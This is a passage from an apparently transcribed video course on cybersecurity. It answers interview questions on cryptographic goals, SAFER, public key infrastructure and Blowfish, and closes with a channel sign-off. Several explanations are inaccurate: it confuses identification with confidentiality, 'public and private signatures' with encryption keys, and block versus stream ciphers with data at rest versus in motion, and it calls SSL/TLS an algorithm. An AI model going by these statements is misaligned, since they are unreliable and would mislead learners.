have a delivery report sent to them that the message was delivered to the inbox of the recipient, and thus if the recipient denies having received that message, the delivery report becomes proof of having that message being delivered to their inbox. Thus, both the parties cannot deny of being a part of that particular transaction. Then comes the part of authenticity. Now, in confidentiality, we have created a digital identity, assigned it to a particular person, and we have given them digital signatures where they cannot deny having been a part of that transaction. But authenticity is the part where they try to prove that they are who they claim to be. So if I am claiming a digital identity, I have to prove that I am that person who I'm trying to claim to be. And an example to that is when we go to our gmail.com websites, it first asks us what is our username. Our username is normally our email address, which identifies the account that we are trying to access. Right? So this account is confidential because it is only authorized for a particular person. And once they identify themselves by identifying the email address, that's when the authentication part comes into the picture, where it asks for the password. Now, it has never ever happened that we just go on to the gmail.com, type in a password, and then it figures out which account we are talking about. So the first step is always the confidentiality part, where we identify which account we are talking about, and then we try to authenticate as the owner of that particular account by providing the appropriate password to that account. If both of these match, only then do we get access to that account and we are able to make whatever transactions we want to make. Now, when we are making those transactions, non-repudiation comes into the place where all our activities also being logged. So we have identified our account, we have authenticated ourselves by providing the password. So the proof is there that it is us who are trying to access it. And then whatever activity we do, send an email, receive an email, delete something, attach something, all of those activities are logged and stored as proof of what actions have been done. So tomorrow, if we deny having sent that email, Gmail can still prove to us through those logs that that activity was done by us. And the fourth part is integrity, which ensures that the data received and sent by the sender and received by the recipient has not been modified while in motion. So the integrity part is the trustworthiness of that data, that the data has not been modified by any hacker or any other entity and is still trustworthy. So these are the four prime objectives of modern cryptography. Once I have scrambled that data using my public signature, it is only my private signature that is going to decrypt it, right? Using these mechanisms, I will be able to achieve all these four aspects of cryptography and security. Next question, what is Safer? Now, Safer stands for Secure and Fast Encryption Routine, which is also a block cipher. As we have discussed previously, block cipher is a cipher that is used to encrypt data that is stored. So it has a 64-bit block size and byte-oriented algorithm. Safer's encryption and decryption procedures are highly secure. This technology is widely used in applications like digital payment cards. So when you're using a digital payment gateway to make transactions, so you have gone onto an online portal, you want to purchase a particular item, and then it takes you to another payment gateway where you have to fill in your credit card information, sensitive information like your expiry date, CVV information, and then the OTP or the password that you have created for your particular account. Now, all of these need to be secured or highly secured based on PCI DSS, which is the payment card industry data security standard. So these standards ensure that certain protocols are utilized to attain that level of security. Safer is one of those block ciphers that is used under the digital payment gateway infrastructure. Next question, how does the public key infrastructure work? Now, we have already discussed this in the previous diagrams. We have identified the key players, the certification authority, the registration authority, the end user who requires the digital certificate, the validation authority who's going to validate it, and then the recipient, the end user with whom the transaction is going to be conducted. So the first point here is the request for the digital certificate is sent to the registration authority, they validate it, and then they okay to the certification authority, who then process the request, and the digital certificate is issued to the person who has requested it. So when the person wants to conduct that transaction, they use that digital certificate to sign that transaction with the end user. The end user validates that with the validation authority, and once validated, the transaction goes through. And now the last question, what is the blowfish algorithm? It is a 64-bit symmetric encryption algorithm. So this is an algorithm that uses the same key to encrypt and the same key to decrypt. The same secret key is used to encrypt and decrypt the messages. Here the operations are based on exclusive ORs and additions to on 32-bit words. The key has a maximum length of 448 bits. Now this is a little bit technical. You might not want to go this technical in an interview question. You just need to identify what the algorithm is used for. So whether it is a symmetric algorithm, which means it uses the same key, or a asymmetric algorithm where it uses a public key to encrypt and a private key to decrypt. Thus the blowfish algorithm is just one more algorithm which uses symmetric encryption to encrypt and decrypt data. Algorithms that we have seen, RSA and others that we have discussed. As far as the interview questions are concerned, what we need to remember is which algorithms are symmetric, which algorithms are asymmetric, what do symmetric algorithms do, and what do asymmetric algorithms do. And we also look at block ciphers and stream ciphers. Block ciphers are utilized to encrypt data that is stored, stationary data, data at rest, and stream ciphers are utilized for data in motion while they're being streamed. So SSL and TLS is another algorithm that comes into the picture when we are looking at streaming data.
And with that, we have come to the end of this session on Cybersecurity Crash Course. I hope it was informative and interesting. If you have any questions related to the topics that were covered in this video, please ask away in the comment section below. Our team will help you solve your queries. Thanks for watching, stay safe and keep learning.
Hi there, if you like this video, subscribe to the Simplilearn YouTube channel and click here to watch similar videos. To nerd up and get certified, click here.